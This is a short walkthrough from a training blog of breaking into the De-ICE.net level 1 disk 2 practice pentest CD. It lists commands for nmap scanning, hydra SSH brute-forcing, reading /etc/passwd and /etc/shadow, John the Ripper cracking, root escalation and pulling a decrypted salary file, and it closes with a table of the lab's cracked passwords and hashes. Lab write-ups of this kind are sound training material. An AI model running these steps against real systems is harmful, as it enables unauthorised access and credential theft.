Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3194722
Download video:http://www.mediafire.com/download.php?nt3ugmz02tw
Commands: http://pastebin.com/f7a1db54f


What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.


What do I need?

> BackTrack 4 (Final)
> de-ice.net-1.110-1.1.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)


Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:


Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks


Commands:
Code:
nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.100

firefox 192.168.1.100

[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast

hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s

ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter

cd /etc/

cat passwd

[+]kate -> Update usernames. Save.

cat group

exit

cd /root/tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords

ssh aadams@192.168.1.100
// Password: nostradamus

cd /etc/

sudo cat shadow
// Password: nostradamus

[+]kate -> New -> Paste -> Save. Filename: shadow

exit

john

./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot

ssh aadams@192.168.1.100
// Password: nostradamus

su
// Password: tarot

ls -a

cd ..



ls -a

cd ftp
/

ls -a

cd incoming/

ls -a

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot

cd /etc/

vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)

modprobe capability

exit

exit

ftp 192.168.1.100
// User: root. Password: tarot

ls -a



cd ..


ls -a



cd home



ls -a



cd ftp



ls -a



cd incoming



ls -a


get salary.csv



cd /pentest/passwords/jtr

ls



mv salary.csv ~

[+]kate -> salary.csv

// GAME OVER



----------------------------------------------------------------------------------------------------
Users
root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------



Notes:

Video length: 04:11
Capture length: 08:52
Song: Eryka Badu & Ziggy Marley - I Luv U (Dubstep Mix)

Blog Post: g0tmi1k: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Forum Post:



~g0tmi1k